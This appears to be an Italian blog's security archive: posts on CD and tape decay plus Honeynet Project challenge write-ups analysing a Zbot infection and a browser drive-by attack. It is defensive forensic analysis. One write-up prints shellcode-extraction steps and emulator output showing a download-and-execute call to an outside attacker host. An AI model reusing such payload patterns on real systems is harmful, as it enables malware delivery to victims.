Archivio per la categoria Information security

Poi non dite che non ve lo avevo detto…

Se avete un sito con WordPress non aggiornato all’ultimissima versione, compresi plugin e tema, beh, è il momento di farlo, e di corsa.

A buon intenditor…

Lacrime, pioggia, nuvole, funghi e altre follie

Durante il mio intervento alla conferenza ho parlato di due cose:

  • CD attaccati e distrutti da un fungo
  • altri CD con l’autodistruzione incorporata

Per motivi che è tropo lungo spiegare, non sono inclusi nelle slide. Ora faccio ammenda, mostrando tutto il necessario per completare l’intervento.
Ve lo devo, voi che siete intervenuti.

Il fungo mangia-CD

Il riferimento migliore è l’omnicomprensivo CD-R FAQ, ma si trovano altri riferimenti:

In breve: in particolari condizioni climatiche, un fungo comunissimo (il Geotrichum candidum, responsabile ad esempio della fioritura del formaggio Camembert) è in grado di attecchire sul rivestimento protettivo del CD, anche stampati, non solo i registrabili. Il risultato è di esporre l’alluminio della metallizzazione, usato per rendere la superficie riflettente, all’aria. L’alluminio, ossidandosi, diventa trasparente, perdendo la sua reflettività, quindi il CD diventa illeggibile.

Naturalmente questo avviene in climi particolari, dove la temperatura è costantemente sopra i 35° C e l’umidità abbondante, condizioni tipiche dei paesi tropicali.

I CD con l’autodistruzione incorporata

I CD con l'autodistruzione inclusa

I CD con l'autodistruzione inclusa

Nella foto sopra potete vedere di cosa parlo. Il CD in alto a destra è stato dimenticato in un lettore di CD di tipo Hi-Fi per 6 anni. Era nella stanza di fianco a quello in basso a destra, che presenta lo stesso tipo di deterioramento. Alla conferenza avevo parlato di quello dimenticato nel lettore, ma arrivato a casa ho deciso di intraprendere un controllo più esteso, e ne ho trovato un altro con lo stesso problema, solo che questo era nella sua custodia, quindi l’ipotesi che qualcosa avesse deteriorato il CD dimenticato nel lettore è da scartare.

E’ molto più probabile si tratti di un errore nel ciclo produttivo, visto che un altro CD della stessa casa, prodotto nello stesso periodo, presenta lo stesso problema. Qualcosa ha reso lo strato protettivo permeabile all’aria, ed ecco che l’alluminio dello strato riflettente se ne sta andando, lentamente ed inesorabilmente. Entrambi i dischi sono ancora leggibili, e la musica riesce a venirne fuori, in qualche modo.

La produzione risale al 2001, i dischi sono tutti originali stampati, non sono CD-R. Per confronto ho messo un CD stampato nel 1984 (a sinistra), e come si vede il colore è proprio quello dell’alluminio, uniforme e senza aloni. L’ipotesi dell’errore in produzione è forse la più plausibile.

Dettaglio del CD deteriorato

Dettaglio del CD deteriorato

Come si vede nel dettaglio, il disco sta diventando trasparente per tutta la superficie, leggermente di più vicino al bordo esterno. La parte opaca è protetta dalla grafica stampata, ma dal colore si capisce che il deterioramento è uniforme. Si vede chiaramente il mattoncino LEGO® bianco che ho messo per tenere inclinato il CD

Ora, questo non mi rende meno preoccupato. Quanti dischi sono stati prodotti con processi i cui difetti si presenteranno nel lungo termine? Nessuno lo sa.

Per salvare il salvabile, dovrei fare una copia dei CD, ma è illegale. Potrei scaricarne una copia via peer to peer, ma è illegale anche se ho gli originali.

Quale potrebbe essere probabilmente la risposta degli autori se gliene chiedo una copia “legale”, visto che la mia si sta deteriorando?

Lacrime, pioggia e nuvole: che fine faranno i nostri ricordi?

Gli amici di CFItaly organizzano un convegno gratuito in Roma e mi hanno coinvolto nella realizzazione degli interventi, cosa che sono ben felice di fare.
Parteciperanno quasi tutti quelli del primo convegno di CFI del 2008:

Il mio intervento riguarderà il problema, per ora destinato a rimanere senza facile soluzione, della durata dei supporti di memorizzazione, sia analogici che digitali.
Vista l’importanza che stanno assumendo le cosiddette “fonti di prova digitali” nel contrasto della criminalità, è diventato necessario capire quanto i supporti possano sopravvivere nel tempo con il loro contenuto utilizzabile.
Per chi è interessato, ci si vede a Roma il primo di ottobre. Tutti le informazioni ed i dettagli sul sito:
DIGITAL FORENSICS AND SECURITY CONFERENCE 2011

Edit

Queste sono le slide del mio intervento.

Tags: , , , , ,

Archivi storici: un problema che si risolverà da solo

Esiste una particolare categoria di archivi storici che pone problemi peculiari: le registrazioni audio e video.

A differenze di altri materiali storici, le registrazioni hanno bisogno di un intermediario per essere “fruite”: il riproduttore.

La situazione in questo campo si avvia ad essere irreversibile. Facciamo un esempio, prendendo a riferimento un supporto estremamente diffuso in ambito radiofonico: il nastro magnetico analogico da 1/4 di pollice.

Una bobina di nastro da 1/4"

Una bobina di nastro da 1/4"

Negli archivi di molte radio e televisioni vi sono centinaia di migliaia di questi supporti, con registrazioni che vanno dagli anni ’50 in poi, ancora utilizzabili e recuperabili senza troppo sforzo, la cui conservazione non è un problema, e non lo sarà ancora per almeno venti anni.

Uno degli archivi della RAI

Uno degli archivi della RAI

Un giorno, occorrerà pensare a recuperare queste registrazioni ed a convertirle in una forma maggiormente fruibile e meno soggetta alla tirannia del tempo. Tutto è già stato pensato e ripensato, per cui esistono strategie, tecnologie e procedure, collaudate e consolidate, per recuperare e conservare le registrazioni di questo tipo. Non è questo il problema.

Il problema nascerà quando (e se) si cercherà un riproduttore per recuperare il materiale. I principali produttori sono Revox per la parte consumer, Studer e Otari per la parte broadcasting. Di queste, solo Otari ha in catalogo un riproduttore per questo tipo di nastri, mentre le altre due hanno addirittura cessato anche l’assistenza e la manutenzione dal 2008.

Il mercato ha leggi che se ne infischiano delle “nicchie”, e quella degli archivi storici di registrazioni è una nicchia, per quanto estesa possa sembrare. Non occorre essere veggenti per predire che sono rimasti pochi anni, dopo i quali sarà impossibile reperire sufficienti riproduttori, testine magnetiche e parti di ricambio per recuperare tutto il materiale storico. Coniugando questo con il fatto che spesso gli archivi hanno un catalogo incompleto e frammentario, per usare un eufemismo, ne discende obbligatoriamente che non è neanche possibile selezionare il materiale da salvare:

  • Perché potrebbe non essere catalogato correttamente, o non catalogato affatto
  • Perché per selezionare il materiale occorre ascoltarlo

Dal secondo punto ne discende che tanto vale riversarlo in toto, senza stare a separare il grano dalla pula. Fra l’altro, per poter decidere se un materiale valga il recupero occorre che sia ascoltato da persone con particolari competenze, che variano in funzione del tipo di materiale registrato: in una registrazione potrebbe esserci un notiziario, una intervista, una canzone cantata da qualcuno in particolare, una esecuzione particolare di un brano altrimenti noto, e via così.

Il costo del recupero in sé è talmente basso che non porta nessun vantaggio effettuare la selezione in anticipo. Anche perché il recupero viene effettuato con procedure di riversamento massivo, in cui gran parte del lavoro di controllo è demandato a macchine e software specifici, sempre più abili e versatili nel rimpiazzare l’orecchio umano in alcune attività a bassa competenza: se la testina del riproduttore si è sporcata un software dedicato può segnalare all’operatore che è ora di fare pulizia ben prima che se ne accorga l’orecchio più allenato.

I problemi, quando e se si deciderà per il recupero, arriveranno proprio dai riproduttori. In un archivio contenente 200.000 nastri differenti (non è un numero a caso) si può ipotizzare di usare una ventina di riproduttori per il riversamento, per cui ogni riproduttore dovrà leggere 10.000 nastri, con una durata media di 23 minuti: ogni riproduttore dovrà funzionare per oltre 3.800 ore. Le testine di lettura durano qualche migliaio di ore, ma leggendo nastri un po’ datati la durata potrebbe essere inferiore alle 2.000 ore, dopo il quale andranno sostituite.

L’elettronica, dal canto suo, invecchia. Dopo quindici anni i produttori di condensatori elettrolitici ne dichiarano esaurita la vita utile, anche se mai utilizzati. Figuriamoci se andiamo a parlare di fedeltà di riproduzione: ben prima dei quindici anni si sentono gli effetti di invecchiamento dell’elettronica sul suono riprodotto.

Per farla breve: partendo oggi, potrebbero essere sufficienti i riproduttori esistenti per riversare tutto il materiale esistente, ammettendo di poter cannibalizzare parte del parco in circolazione per tenere efficienti i riproduttori. E’ un margine esiguo, che ogni anno che passa si assottiglia e avvicina sempre più la soluzione definitiva per gli archivi di registrazioni: l’oblio.

Tags: , ,

Blocca il computer quando ti alzi. No, aspetta, ho una idea migliore!

Didier Stevens, un guru del formato PDF, oltre che di molte altre cose legate alla sicurezza, quella vera, non le chiacchiere, ha rilasciato una semplicissima applicazione che potrebbe essere l’uovo di Colombo, per alcune situazioni.

Ha connesso un sensore di temperatura a infrarossi con uscita USB al computer. Questo tipo di sensore è in grado di misurare la temperatura di qualsiasi cosa verso cui viene puntato, senza alcuna necessità di contatto, quindi anche a distanza.

Il sensore è puntato verso la sua sedia. Se la temperatura misurata scende sotto i 25° la sua applicazione blocca schermo e tastiera del computer, esattamente come quando parte lo screensaver del computer.

In pratica, se l’operatore si alza dalla sedia senza bloccare il computer, appena esce dal campo visivo del sensore termico il computer si blocca da solo. Utile per tutte le situazioni in cui un “occasionale passante” non debba leggere i dati sullo schermo di un computer rimasto senza operatore.

Personalmente lo userei al contrario: bloccare ogni accesso appena un essere umano vi si siede davanti, dato che la maggior parte dei problemi dei computer si trova fra la tastiera e la sedia… PEBKAC, you know.

Honeynet Project: Challenge 3/2010 (II parte)

La prima parte è qui.

La quinta domanda chiedeva se era possibile estrarre qualche file dal processo inizialmente responsabile per l’attacco. Dato che il processo sospettato era Acrobat Reader, tramite Volatility ne ho estratto l’immagine in memoria del processo, dopodiché ho provato ad usare foremost su di essa. Il risultato è interessante, anche perché due file PDF estratti dall’impronta in memoria del processo non vengono estratti se invece si esegue foremost sull’intera immagine della memoria. I due file interessanti sono rispettivamente di 60kbyte e di 600kbyte, ed il primo è cifrato.

Usando i PDF-tools di Didier Stevens si riesce ad analizzare la struttura dei file PDF, anche se tutti risultano corrotti in vari modi.

Quello cifrato non riserva particolari sorprese, mentre quello da 600kbyte ha una “azione automatica” eseguita all’apertura del documento, ossia l’esecuzione di un codice Javascript. Il codice Javascript è nascosto in un blocco con il tag di identificazione del tipo offuscato: /F#6c#61#74e#44e#63#6fde e /#41#53#43II#38#35#44#65#63#6fd#65 che in realtà corrispondono a: /FlateDecode /ASCII85Decode. Usando l’utility pdf-parser.py, sempre nei PDF-tools, si riesce ad estrarre il blocco ed a mettere le mani in un consistente blocco (84kbyte) di codice Javascript pesantemente offuscato.

La sesta domanda chiede di individuare la tecnica usata per sferrare l’attacco. Questa è forse la risposta che ha richiesto più lavoro. L’attacco viene portato dal file PDF usando un tag di tipo /AA, che nel formato PDF sta per Add Action. In breve, è possibile associare un’azione alla visualizzazione di una determinata pagina. In questo caso l’azione è stata di mandare in esecuzione il blocco di codice Javascript. Per capire cosa abbia fatto il codice, occorre invertire l’offuscamento, ma le cose non sono così semplici. Il Javascript usato da Acrobat Reader è certamente standard, tanto da essere possibile eseguirlo in Firefox, ad esempio, ma quello che cambia drasticamente sono le funzioni disponibili all’interno dell’ambiente di esecuzione. In Acrobat, Javascript ha a disposizione tutte le funzioni necessarie per lavorare con i file PDF (e non solo quelli), funzioni che in Firefox, ad esempio, non esistono. Quindi eseguire il blocco di codice Javascript in Firefox, racchiudendolo tra i tag SCRIPT non produce alcun risultato utile. Esaminando un po’ il codice “a vista” si riesce ad individuare una chiamata alla funzione Javascript eval( ). Riuscire a vedere il parametro (la stringa) passata ad eval spesso significa vedere il codice non offuscato. Installando Firebug in Firefox si riesce nell’intento. Basta piazzare un breakpoint subito prima della chiamata alla funzione eval e si ottiene il codice Javascript in chiaro.

Ebbene, il codice Javascript contiene ben tre differenti shellcode, da usare in funzione della versione di Acrobat Reader (7, 8 o 9). In tutti e tre i casi il risultato dell’esecuzione dello shellcode è che viene scaricato un file eseguibile ed avviato senza possibilità di intervento dell’utente.

La settima domanda chiede di individuare eventuali file sospetti caricati da un qualsiasi processo attivo nella macchina in esame, e se tale file possa essere messo in relazione con l’attacco iniziale. Anche qui Volatility fa la parte del leone, utilizzando anche un plugin sviluppato da Michael Hale Ligh. Nel processo relativo a WinLogon si trovano quattro file sospetti: \WINDOWS\system32\sdra64.exe, \WINDOWS\system32\lowsec\user.ds, \_AVIRA_2109 e \WINDOWS\system32\lowsec\local.ds. Dalla successiva analisi si vedrà che tali file sono associati proprio al malware Zbot. Eseguendo il citato plugin di Volatility per estrarre codice iniettato in altri processi sul processo di WinLogon, si ottengono sei file, ma solo uno di loro contiene stringhe relative ai file sospetti trovati prima. Interessante è anche una lista di nomi di funzioni esportate da alcune DLL di sistema di Windows. Tali funzioni vengono utilizzate per iniettare codice in altri processi. Lo stesso file, passato a VirusTotal per l’analisi viene identificato come una variante di Zbot.

Tags: , ,

Non si può vincere sempre

Altrimenti non si capirebbe la differenza.

Alla quarta sfida del progetto Honeynet, quella sul VoIP, ho totalizzato 60 punti su 63, classificandomi quarto. Mi rifarò nelle prossime sfide, potete contarci. Piuttosto, nessuno che voglia cimentarsi in una gara nella gara, confrontando i risultati al termine delle votazioni?

Non lasciatemi solo a difendere la bandiera tricolore!

Tags: , ,

Honeynet Project: Challenge 3/2010 (I parte)

Ho da poco inviato la mia soluzione alla quarta sfida del progetto Honeynet, riguardante il VoIP. Nell’attesa dei risultati, previsti per la fine di luglio, vediamo la soluzione data alla terza sfida del progetto, che riguardava l’analisi di una immagine di memoria acquisita live su un computer presumibilmente colpito da una qualche forma di malware.

Problemi con l’home banking

Nella mia soluzione ho premesso un riassunto generale di come si è svolta la sequenza di azioni dedotte dall’analisi. Non era richiesta, ma ho pensato che, data la complessità della sfida, fornire un quadro generale avrebbe aumentato la comprensione.

Il campione da esaminare è l’immagine della memoria, un file da 500mbyte.

Tutto inizia con un messaggio e-mail, contenente un allegato in PDF, che all’apertura in Acrobat Reader provoca l’esecuzione di un frammento di Javascript che, sfruttando una falla in Acrobat, riesce a scaricare ed a mandare in esecuzione un eseguibile, senza alcun intervento da parte dell’utente.
L’eseguibile è una variante del malware Zbot, un pezzo del kit di crimeware denominato ZeuS. Questo malware, fra le altre cose, posiziona alcune chiavi di registro relative al processo di WinLogon, assicurandosi l’avvio ad ogni partenza del sistema. Alla partenza sfrutta il meccanismo degli hooks per iniettare codice in tutti i processi di sistema ed utente di cui ha bisogno per fare il suo lavoro.

Andiamo con la prima domanda, che chiede di elencare i processi in esecuzione al momento dell’acquisizione della memoria del computer colpito e di indicare quale sia il processo responsabile della prima fase dell’attacco.
Ricavare questo da una immagine di memoria non è proprio banale, per cui mi sono documentato ed ho trovato una raccolta di strumenti per l’analisi della memoria di Windows, denominata Volatility.
Tramite questi strumenti, open source, è possibile ricavare parecchie informazioni senza andare di editor esadecimale e di certosina pazienza.
Con la funzione di elenco processi di Volatility, appunto, in pochi secondi si ha la lista completa. Ora si tratta di individuare quello responsabile. Se tutto è nato da un PDF allegato ad un messaggio e-mail, è molto probabile che il colpevole sia Acrobat Reader (che ha PID 1752), ma per puntare il dito con più certezza occorre andare avanti con l’analisi.

La domanda successiva chiede di mostrare l’elenco dei socket aperti sul computer vittima, e di indicare se vi siano processi sospetti che abbiano socket aperti.
Occorre incrociare i dati di tre liste, quella dei processi, quella dei socket aperti e quella delle connessioni di rete, in quanto le ultime due fanno riferimento al PID del processo che li gestisce, mentre la lista dei socket elenca anche su che protocollo e quale porta è attivo il socket, dato da incrociare con la connessione TCP o UDP che lo usa.
In breve, saltano fuori tre connessioni sospette, due con un indirizzo IP di un hosting israeliano, una con un indirizzo IP di un hosting maltese.
Vi sono anche altri socket sospetti, due dei quali fanno riferimento alle porte usate nel servizio UPnP di Windows (vedere l’articolo della knowledge base kb832017).
Vi sono dei riferimenti ad un indirizzo IP (192.168.0.1), che tornano ad una semplice ricerca di stringhe all’interno dell’immagine. Verosimilmente si tratta delle pagine di amministrazione web di un router/gateway per piccoli uffici. Sempre nell’immagine della memoria si trovano tracce di queste pagine web e di alcune transazioni SOAP volte ad aprire porte da Internet verso il computer in analisi.
Potrebbe non essere significativo, ma potrebbe anche essere il segno di un tentativo di sfruttare una nota vulnerabilità del protocollo UPnP, per cui non si possono trattare come innocue.
In definitiva, abbiamo due processi con porte aperte o connessioni sospette: PID 880, una istanza di svchost.exe, ed il processo di Acrobat Reader, che pur essendo responsabile probabilmente solo della violazione iniziale, ha ancora due connessioni in piedi col server web che ha originato l’attacco.

La terza domanda chiede di elencare gli eventuali URL sospetti nella memoria del processo sotto indagine.
Gli URL ci sono, cercandoli sia usando gli indirizzi IP trovati in precedenza, sia usando il nome “search-network-plus.com”, con cui è stato registrato l’indirizzo IP dell’hosting israeliano. Gli URL dell’hosting maltese fanno pensare ad un sito terzo, forse violato, su cui è stato inserito uno script PHP che provvede a reindirizzare il visitatore verso l’hosting israeliano, che provvede a fornire il file PDF forgiato.

La quarta domanda chiede se vi siano riferimenti riconducibili a problemi con l’home banking, quali siano i processi e gli URL.
Un URL in particolare è molto interessante, quello che riporta il nome di un noto istituto bancario americano. L’URL è scritto usando alcuni caratteri a mo’ di wildcard. Ebbene, questo schema è del tutto identico a quello usato nel malware Zbot per indicare in quali pagine web visitate è da iniettare il codice HTML per rubare le credenziali di accesso.
In pratica, questo malware riesce a intercettare tutto il traffico con Internet e sulla base degli URL indicati riesce a modificare al volo il codice HTML ricevuto dal sito dell’istituto bancario. Queste modifiche sono volte a deviare le credenziali inserite dall’ignaro utente verso che controlla il malware. In breve, opera come in una operazione di phishing, ma il sito che viene visitato è quello della banca, e il furto di credenziali avviene nel computer dell’utilizzatore e vittima, non in un sito contraffatto.

Tags: , ,

Honeynet Project: Challenge 2/2010 (III e ultima parte)

Questa è la parte finale della soluzione. Le precedenti sono qui e qui.

La nona domanda chiedeva quali azioni fossero eseguite dagli shellcode, di elencarli (insieme all’hash MD5 del binario) e di mostrare le differenze fra loro.
Gli shellcode sono tutti contenuti nel pacchetto #496, all’interno del codice Javascript offuscato. L’unica differenza viene da un URL codificato all’interno degli shellcode stessi, in cui varia il valore del solo parametro “e” di tipo url-encoded.
Come estrarre gli shellcode è abbastanza semplice: ho usato un copia e incolla del blocco codificato in UTF in un comando shell per convertire il simbolo di percentuale in backslash, poi ho scritto tre-righe-tre di Python per trasformare il tutto in un file binario. Questo il comando shell:

$ echo "%uc033%u8B64%u3040...." | tr "%" "\\"

Questa invece la sequenza dei comandi Python:

import io
import codecs
f = io.open('spreadsheet.bin','w',1,'utf-16')
a=u'\uC033\u8B64\u3040....' (output dal comando tr)
f.write(a)
f.close()

Il risultato è un file codificato in UTF, con in testa il BOM (Byte Order Mark), i due byte 0xFE e 0xFF, che a noi non servono, e quindi li tagliamo con il comando:

$ dd if=aolwinamp.utf of=spreadsheet.bin bs=1 skip=2

Et-voilà, ora abbiamo lo shellcode in binario pulito. Come capire cosa faccia, è tutto un altro paio di maniche. Procedere al solo disassembly è inutile, in quanto quasi certamente verranno chiamate funzioni proprie del sistema operativo, che in assembler sono delle semplici “call” con un indirizzo fisico, totalmente inintelligibili. Viene in aiuto un programma, creato dagli stessi del progetto Honeynet, chiamato libemu.
Occorre scaricarlo e compilare gli esempi, fra cui c’è sctest, che “esegue” lo shellcode tracciandone le azioni e le funzioni di sistema chiamate, oltre alle eventuali librerie utilizzate.
Fin qui niente di strano, se non fosse che lo shellcode in esame contiene una chiamata ad una funzione di sistema che non è compresa fra quelle emulate, GetTempPathA, quindi libemu esce con un messaggio di errore, dato che non ha idea di come “emulare” questa funzione. Una ricerca sul sito Microsoft dedicato agli sviluppatori e si trova la definizione della funzione, con i parametri in ingresso ed il valore di ritorno atteso. Poi occorre mettere mano al sorgente di libemu per creare un “hook” alla funzione mancante. Basta copiare il codice di una simile, cambiando opportunamente i parametri ed il valore di ritorno, poi modificare i vari header per includere la funzione fra quelle conosciute. Ricompilare (correggere gli inevitabili errori…) e riprovare. Ecco l’output:

$ /opt/libemu/bin/sctest -Svgs 1000000 < spreadsheet.bin
verbose = 1
success offset = 0x00000000
Hook me Captain Cook!
userhooks.c:127 user_hook_ExitThread
ExitThread(0)
stepcount 295995
UINT GetTempPath (
     LPTSTR lpBuffer = 0x0012fe18 =>
         none;
     UINT uSize = 136;
) = 19;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x0012fe04 =>
           = "urlmon.dll";
) = 0x7df20000;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x004170e0 =>
           = "http://sploitme.com.cn/fg/load.php?e=8leCursorInfo";
     LPCTSTR szFileName = 0x0012fe18 =>
           = "e.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x0012fe18 =>
           = "e.exe";
     UINT uCmdShow = 0;
) = 32;
void ExitThread (
     DWORD dwExitCode = 0;
) = 0;

Tradotto: viene scaricato un file, chiamato poi “e.exe”, dall’URL http://sploitme.com.cn/fg/load.php?e=8, e mandato in esecuzione.
Nell’attuale versione di libemu non è più necessario fare tutta la trafila, la chiamata di sistema è già correttamente emulata.

La decima domanda chiedeva se vi fosse coinvolto un malware e quale ne fosse lo scopo. In cinque occasioni viene scaricato un file eseguibile, identico in tutte le istanze, che non viene identificato da nessun antivirus come pericoloso. Eseguito in una macchina virtuale risulta in un errore di tipo Access Violation (0xc0000005), ed anche disabilitando la “Executable Prevention Protection” non si ottiene nulla.
Usando il comando strings sull’eseguibile si trovano tre stringhe significative, una delle quali è il path completo per lanciare Internet Explorer, nella versione inglese di Windows però, visto che il path è cablato nell’eseguibile e usa la directory “Program Files”.
L’azione dell’eseguibile è probabilmente lanciare Internet Explorer e puntarlo ad un sito particolare, nel caso in esame verso il sito del progetto Honeynet.

Ed eccoci alla domanda bonus, che era offuscata usando una semplice codifica Base64. Una volta decodificata, la domanda verte sulla timeline, ossia sulla collocazione temporale degli eventi registrati. In pratica, mentre la cattura appare iniziata il primo di gennaio 2010 all’una di notte, all’interno di alcuni protocolli vi sono riferimenti temporali che riportano una data differente, il 2 febbraio 2010 alle ore 19.
La spiegazione più semplice è che sia stata modificata la data di inizio, e che la cattura sia avvenuta in diretta, come mostrano alcune indicazioni riguardo pause nell’elaborazione e la concordanza in tutti i pacchetti che riportano una collocazione temporale insita nel protocollo stesso (HTTP ad esempio).
Questo conclude l’analisi.

Cosa si può imparare da questa sfida

Personalmente, conoscevo già alcune delle tecniche utilizzate e necessarie per risolvere l’enigma, ma molte altre mi erano sconosciute e le ho dovute acquisire. L’uso di libemu, l’uso di UTF e del BOM, le funzioni di Python per la codifica UTF, per citarne qualcuna.
Naturalmente, il poter risolvere la sfida richiedeva competenze in vari campi: protocolli di rete, linguaggi di programmazione, programmazione sicura, tecniche di sfruttamento delle falle di sicurezza, conoscenza di HTML/CSS e del DOM. Senza queste è impossibile venirne a capo, ed è inutile provarci.

E’ importante capire che non è l’uso degli strumenti, ad essere importante, ma il contesto e lo scopo per cui si utilizzano. Usare libemu è abbastanza banale, ma capire quando usarlo e interpretarne i risultati non è insito nel funzionamento dello strumento, ma spetta all’utilizzatore, cioè a noi. Non è la racchetta che fa il tennista.

Chiudiamo qui. A breve la soluzione della sfida successiva, molto più impegnativa, almeno per me.

Tags: ,

Honeynet Project: Challenge 2/2010 (II parte)

Come promesso, eccoci alla seconda parte della soluzione per la sfida Browser Under Attack del progetto Honeynet (la I parte è qui).

La quarta domanda chiedeva di tracciare un quadro generale delle operazioni svolte dagli attaccanti. Naturalmente, qui siamo in presenza di una simulazione, nel mondo reale le cose sarebbero andate in questo modo, più o meno:

  • Usando varie tecniche (XSS, RFI, ecc.) gli attaccanti iniettano il codice Javascript in alcuni siti web vulnerabili. Il codice è profondamente offuscato, e lavora in modo nascosto e silenzioso, usando tag IFRAME e applicando stili CSS specifici per nascondere la propria presenza, oltre alle modifiche nelle pagine web attaccate.
  • Quando un visitatore arriva sulla pagina con il codice nascosto, il browser viene “dirottato” verso un server (sploitme.com.cc) che contiene codice attivo di analisi e di attacco. Per prima cosa il browser viene indirizzato con un apposito header HTTP di tipo 302 Found verso una pagina di errore
  • La pagina di errore è in realtà una trappola, ed è falsa, tanto che che l’analisi dei pacchetti di risposta dal server mostra un codice HTTP di risultato del tipo 200 OK, mentre la pagina simula un errore di tipo 404 Not Found (vedi pacchetti #63,174,366). Questa pagina, lato server, contiene in realtà un codice di analisi che controlla il tipo di browser.
  • In funzione del risultato dell’analisi (nel seguito se ne vedrà il tipo e lo scopo), nella falsa pagina 404 viene emesso un altro pezzo di codice Javascript, anche questo profondamente offuscato, che tenta di sfruttare varie falle nel browser per eseguire codice arbitrario.
  • Vi sono indizi (vedi pacchetti da #299 a #366) che il codice lato server sia in grado di capire da quale nazione giunga il visitatore, attraverso uno dei tanti servizi di geolocalizzazione, per escludere i visitatori da una certa nazione, o per includere solo quelli provenienti da una nazione, dall’essere colpiti. La prova viene dalla cattura stessa, dove viene visitato il sito principale di Google, www.google.com, che come sappiamo inoltra i visitatori verso i server di Google della nazione di provenienza: il browser viene inoltrato verso www.google.fr, ossia Google in francese. La visita immediatamente successiva fatta dallo stesso browser ad uno dei siti violati simulati (Il finto RapidShare) porta alla fine ad una falsa pagina 404 sul sito attaccante (sploitme.com.cn) che non contiene alcun codice Javascript (vedi pacchetto #366).

La quinta domanda chiede di elencare le contromisure prese per rallentare l’analisi. Naturalmente, ogni criminale informatico che si rispetti sa che le tracce del suo passaggio sono evidenti ad un occhio esperto, mentre un occhio meno esperto può essere ingannato per un tempo più o meno variabile. Dato che lo scopo è di colpire più utenti possibile, e di rallentare l’individuazione del malware per poter fare più danni possibile, normalmente sono prese alcune contromisure, abbastanza tipiche:

  • Il codice iniettato è sempre offuscato, e qualche volta camuffato da altro, per cui facilmente passa inosservato, anche al webmaster più attento.
  • L’attacco viene portato senza aprire altre finestre o popup, per cui sembra provenire dal sito violato, non dal sito chiamato dal codice Javascript dentro i tag IFRAME.
  • L’attacco è portato appunto da un sito differente, che non compare mai nel codice, ma solo nel Javascript offuscato, per cui è impossibile saperlo senza svelare il codice stesso.
  • Anche svelando il codice Javascript offuscato e ricavando il nome del sito attaccante, ci si trova davanti ad una pagina 404 (falsa ma efficace).
  • Il codice Javascript che tenta di eseguire codice arbitrario sfruttando falle note è codificato usando la notazione Unicode con una escape sequence esadecimale (%u1234), e non è banale da decodificare.

Inoltre, data la presenza di un codice che analizza il tipo di browser che visita la pagina aggressiva, si può ipotizzare che ai visitatori che si presentano con browser e/o sistemi operativi alternativi (come molti professionisti nel campo della sicurezza) venga mostrata una pagina con codice inoffensivo.

La sesta domanda chiede di presentare il codice Javascript identificato nelle precedenti risposte, e di svelarlo, se offuscato. Non riporto per intero il codice, anche perché sarebbe lungo e difficile da comprendere (è riportato per intero nella mia soluzione, pubblicata nella pagina del sito Honeynet relativa alla sfida).
Vale la pena però di fare alcune considerazioni. In tutti i casi il codice Javascript è offuscato, ed in un caso l’offuscamento è annidato, ossia il codice originale è offuscato una prima volta usando la funzione Javascript escape(), ed il risultato è offuscato di nuovo usando una funzione scritta appositamente. Il metodo di offuscamento usato in tutte le false pagine 404 è identico, quello che cambia è il codice Javascript risultante.
Altra cosa da notare è che in presenza del browser Firefox il codice emesso è inoffensivo.

La domanda successiva chiede quale possa essere la funzione della variabile “s” negli URL.
Il valore della variabile è fissato nel codice Javascript iniettato nei siti violati, ed è differente da un sito all’altro. Il valore viene mantenuto nei vari reindirizzamenti, per cui lo scopo non è quello di selezionare l’attacco, cosa che invece è decisa in base al browser o alla geolocalizzazione. Lo scopo, verosimilmente, è quello dell’affiliazione, ossia decidere a chi appartiene il computer dell’ignaro visitatore ad uno dei siti violati, attaccata e conquistata da un malware. Dato che il server che distribuisce il malware è unico, con questo modo si individua l’appartenenza ad un circuito botnet differente. Se il sito A è violato da Mario, ed il sito B è violato da Carlo, tutti e due i siti reindirizzano verso il server attaccante, ma ognuno con un codice di affiliazione differente, permettendo di distinguere a chi assegnare il computer colpito.

L’ottava domanda chiede quale sistema operativo e quale browser siano i bersagli scelti per l’attacco, quali vulnerabilità siano colpite e se sia possibile prevenire l’attacco stesso.
La riposta è piuttosto articolata, ed in breve può essere riassunta così: il bersaglio è Windows XP con Service Pack 2 o precedenti, il browser è Internet Explorer 6, di cui vengono attaccati parecchi componenti ActiveX, sia nativi che forniti da altre applicazioni. Alcune vulnerabilità sono state scoperte nel 2005, mentre altre sono molto recenti, risalendo a fine 2009.
L’unica prevenzione è aggiornare sistema operativo, browser e applicazioni. Naturalmente (questo non l’ho scritto nella soluzione presentata), usando un account non amministrativo per navigare, pur rimanendo colpiti dal malware, in molti dei casi esposti sopra questo non può fare danni, in quanto non ha i privilegi amministrativi, essendo eseguito con i privilegi di Internet Explorer, quindi di un utente “limitato”. Visto che nessuno usa questa strategia, chi sfrutta queste vulnerabilità ha la certezza di colpire praticamente chiunque gli venga a tiro.

Chiudiamo qui. La prossima e ultima parte sarà piuttosto corposa, visto che riguarderà l’analisi degli shellcode.

Tags: ,